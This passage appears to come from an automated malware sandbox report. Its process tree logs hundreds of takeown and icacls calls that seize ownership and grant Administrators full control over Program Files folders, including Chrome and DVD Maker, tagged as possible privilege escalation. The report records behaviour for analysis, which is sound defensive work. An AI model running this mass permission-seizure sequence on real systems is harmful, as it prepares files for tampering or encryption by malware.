  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe" /grant Administrators:F
  2⤵
  PID:1872
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\1033" /a
  2⤵
  PID:2668
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\1033" /grant Administrators:F
  2⤵
  PID:2448
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Services" /a
  2⤵
  PID:1592
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Services" /grant Administrators:F
  2⤵
  PID:1392
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\SpeechEngines" /a
  2⤵
  - Modifies file permissions
  PID:200
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\SpeechEngines" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:224
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\SpeechEngines\Microsoft" /a
  2⤵
  PID:1732
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\SpeechEngines\Microsoft" /grant Administrators:F
  2⤵
  PID:2132
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20" /a
  2⤵
  PID:216
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20" /grant Administrators:F
  2⤵
  PID:2364
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\de-DE" /a
  2⤵
  PID:2092
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\de-DE" /grant Administrators:F
  2⤵
  PID:1716
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\en-US" /a
  2⤵
  PID:1348
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\en-US" /grant Administrators:F
  2⤵
  PID:1272
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\en-US\enu-dsk" /a
  2⤵
  PID:2600
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\en-US\enu-dsk" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:1956
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\es-ES" /a
  2⤵
  PID:2300
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\es-ES" /grant Administrators:F
  2⤵
  PID:1372
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\fr-FR" /a
  2⤵
  - Possible privilege escalation attempt
  PID:1552
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\fr-FR" /grant Administrators:F
  2⤵
  PID:2320
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\it-IT" /a
  2⤵
  PID:868
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\it-IT" /grant Administrators:F
  2⤵
  PID:2460
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\ja-JP" /a
  2⤵
  PID:1016
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\ja-JP" /grant Administrators:F
  2⤵
  PID:2372
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System" /a
  2⤵
  PID:268
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System" /grant Administrators:F
  2⤵
  PID:2924
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\ado" /a
  2⤵
  PID:1380
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\ado" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:1936
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\ado\de-DE" /a
  2⤵
  PID:3056
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\ado\de-DE" /grant Administrators:F
  2⤵
  PID:1084
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\ado\en-US" /a
  2⤵
  PID:792
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\ado\en-US" /grant Administrators:F
  2⤵
  PID:784
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\ado\es-ES" /a
  2⤵
  PID:1984
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\ado\es-ES" /grant Administrators:F
  2⤵
  PID:2352
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\ado\fr-FR" /a
  2⤵
  PID:3016
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\ado\fr-FR" /grant Administrators:F
  2⤵
  PID:884
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\ado\it-IT" /a
  2⤵
  PID:1588
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\ado\it-IT" /grant Administrators:F
  2⤵
  PID:2812
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\ado\ja-JP" /a
  2⤵
  PID:2944
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\ado\ja-JP" /grant Administrators:F
  2⤵
  PID:2128
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\de-DE" /a
  2⤵
  PID:2652
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\de-DE" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:3020
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\en-US" /a
  2⤵
  - Possible privilege escalation attempt
  PID:2284
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\en-US" /grant Administrators:F
  2⤵
  PID:2448
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\es-ES" /a
  2⤵
  - Possible privilege escalation attempt
  PID:536
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\es-ES" /grant Administrators:F
  2⤵
  PID:1488
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\fr-FR" /a
  2⤵
  - Possible privilege escalation attempt
  PID:1840
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\fr-FR" /grant Administrators:F
  2⤵
  PID:1920
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\it-IT" /a
  2⤵
  PID:2620
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\it-IT" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:1432
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\ja-JP" /a
  2⤵
  PID:2452
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\ja-JP" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:2068
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\msadc" /a
  2⤵
  PID:2588
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\msadc" /grant Administrators:F
  2⤵
  PID:1928
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\msadc\de-DE" /a
  2⤵
  PID:712
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\msadc\de-DE" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:2804
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\msadc\en-US" /a
  2⤵
  PID:1708
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\msadc\en-US" /grant Administrators:F
  2⤵
  PID:1336
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\msadc\es-ES" /a
  2⤵
  PID:1556
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\msadc\es-ES" /grant Administrators:F
  2⤵
  PID:2792
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\msadc\fr-FR" /a
  2⤵
  PID:2460
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\msadc\fr-FR" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:2392
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\msadc\it-IT" /a
  2⤵
  - Modifies file permissions
  PID:1520
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\msadc\it-IT" /grant Administrators:F
  2⤵
  PID:684
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\msadc\ja-JP" /a
  2⤵
  PID:2640
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\msadc\ja-JP" /grant Administrators:F
  2⤵
  PID:1640
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\Ole DB" /a
  2⤵
  PID:1672
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\Ole DB" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:2700
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\Ole DB\de-DE" /a
  2⤵
  PID:2292
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\Ole DB\de-DE" /grant Administrators:F
  2⤵
  PID:2192
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\Ole DB\en-US" /a
  2⤵
  - Modifies file permissions
  PID:1012
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\Ole DB\en-US" /grant Administrators:F
  2⤵
  PID:2552
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\Ole DB\es-ES" /a
  2⤵
  PID:2556
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\Ole DB\es-ES" /grant Administrators:F
  2⤵
  PID:2832
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\Ole DB\fr-FR" /a
  2⤵
  PID:2144
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\Ole DB\fr-FR" /grant Administrators:F
  2⤵
  PID:2356
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\Ole DB\it-IT" /a
  2⤵
  PID:2824
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\Ole DB\it-IT" /grant Administrators:F
  2⤵
  PID:320
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\Ole DB\ja-JP" /a
  2⤵
  PID:2044
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\Ole DB\ja-JP" /grant Administrators:F
  2⤵
  PID:2084
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker" /a
  2⤵
  - Possible privilege escalation attempt
  PID:220
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker" /grant Administrators:F
  2⤵
  PID:2668
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\DVDMaker.exe" /a
  2⤵
  PID:1452
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\DVDMaker.exe" /grant Administrators:F
  2⤵
  PID:2440
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\de-DE" /a
  2⤵
  PID:1824
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\de-DE" /grant Administrators:F
  2⤵
  PID:1816
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\en-US" /a
  2⤵
  PID:1960
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\en-US" /grant Administrators:F
  2⤵
  PID:2068
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\es-ES" /a
  2⤵
  PID:1332
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\es-ES" /grant Administrators:F
  2⤵
  PID:1500
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\fr-FR" /a
  2⤵
  PID:2608
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\fr-FR" /grant Administrators:F
  2⤵
  PID:2600
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\it-IT" /a
  2⤵
  PID:2684
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\it-IT" /grant Administrators:F
  2⤵
  PID:2376
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\ja-JP" /a
  2⤵
  PID:1708
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\ja-JP" /grant Administrators:F
  2⤵
  PID:1924
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared" /a
  2⤵
  PID:2424
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared" /grant Administrators:F
  2⤵
  PID:1624
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles" /a
  2⤵
  PID:2380
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles" /grant Administrators:F
  2⤵
  PID:2460
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy" /a
  2⤵
  PID:1552
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:1284
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl" /a
  2⤵
  PID:2800
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:1308
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage" /a
  2⤵
  PID:1620
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage" /grant Administrators:F
  2⤵
  PID:1828
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\Full" /a
  2⤵
  PID:2784
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\Full" /grant Administrators:F
  2⤵
  PID:2292
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle" /a
  2⤵
  PID:976
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle" /grant Administrators:F
  2⤵
  PID:2180
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles" /a
  2⤵
  PID:2964
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles" /grant Administrators:F
  2⤵
  PID:2520
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\Memories" /a
  2⤵
  - Modifies file permissions
  PID:1116
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\Memories" /grant Administrators:F
  2⤵
  PID:2128
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge" /a
  2⤵
  - Possible privilege escalation attempt
  PID:1736
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge" /grant Administrators:F
  2⤵
  PID:2356
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\Performance" /a
  2⤵
  PID:3016
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\Performance" /grant Administrators:F
  2⤵
  PID:1872
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\Pets" /a
  2⤵
  PID:208
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\Pets" /grant Administrators:F
  2⤵
  PID:2056
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\Push" /a
  2⤵
  PID:2844
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\Push" /grant Administrators:F
  2⤵
  PID:2440
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles" /a
  2⤵
  PID:2432
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles" /grant Administrators:F
  2⤵
  PID:2672
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels" /a
  2⤵
  PID:1980
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels" /grant Administrators:F
  2⤵
  PID:1432
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter" /a
  2⤵
  - Possible privilege escalation attempt
  PID:1440
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter" /grant Administrators:F
  2⤵
  PID:276
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion" /a
  2⤵
  PID:1332
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion" /grant Administrators:F
  2⤵
  PID:344
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\Sports" /a
  2⤵
  PID:712
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\Sports" /grant Administrators:F
  2⤵
  PID:2484
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking" /a
  2⤵
  PID:2600
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking" /grant Administrators:F
  2⤵
  PID:1152
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\Travel" /a
  2⤵
  - Modifies file permissions
  PID:2348
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\Travel" /grant Administrators:F
  2⤵
  PID:2772
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\VideoWall" /a
  2⤵
  PID:604
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\VideoWall" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:2244
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette" /a
  2⤵
  PID:2792
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette" /grant Administrators:F
  2⤵
  PID:2924
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google" /a
  2⤵
  PID:1552
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google" /grant Administrators:F
  2⤵
  PID:1340
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome" /a
  2⤵
  PID:2640
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome" /grant Administrators:F
  2⤵
  PID:2124
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application" /a
  2⤵
  PID:268
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application" /grant Administrators:F
  2⤵
  PID:1964
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\chrome.exe" /a
  2⤵
  PID:2784
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\chrome.exe" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:2324
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\106.0.5249.119" /a
  2⤵
  PID:2708
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\106.0.5249.119" /grant Administrators:F
  2⤵
  PID:648
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\106.0.5249.119\chrome_pwa_launcher.exe" /a
  2⤵
  PID:1868
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\106.0.5249.119\chrome_pwa_launcher.exe" /grant Administrators:F
  2⤵
  PID:1064
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\106.0.5249.119\default_apps" /a
  2⤵
  PID:2396
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\106.0.5249.119\default_apps" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:2284
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Extensions" /a
  2⤵
  PID:1392
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Extensions" /grant Administrators:F
  2⤵
  PID:2132
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer" /a
  2⤵
  PID:2836
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer" /grant Administrators:F
  2⤵
  PID:596
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrmstp.exe" /a
  2⤵
  PID:1348
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrmstp.exe" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:1256
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales" /a
  2⤵
  PID:1712
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales" /grant Administrators:F
  2⤵
  PID:2252
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\106.0.5249.119\MEIPreload" /a
  2⤵
  - Possible privilege escalation attempt
  PID:1536
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\106.0.5249.119\MEIPreload" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:1644
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements" /a
  2⤵
  - Modifies file permissions
  PID:808
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements" /grant Administrators:F
  2⤵
  PID:1152
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\106.0.5249.119\WidevineCdm" /a
  2⤵
  PID:932
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\106.0.5249.119\WidevineCdm" /grant Administrators:F
  2⤵
  PID:1764
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\106.0.5249.119\WidevineCdm\_platform_specific" /a
  2⤵
  PID:1496
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\106.0.5249.119\WidevineCdm\_platform_specific" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:1520
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\106.0.5249.119\WidevineCdm\_platform_specific\win_x64" /a
  2⤵
  PID:1036
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\106.0.5249.119\WidevineCdm\_platform_specific\win_x64" /grant Administrators:F
  2⤵
  PID:1944
- C:\windows\system32\takeown.exe
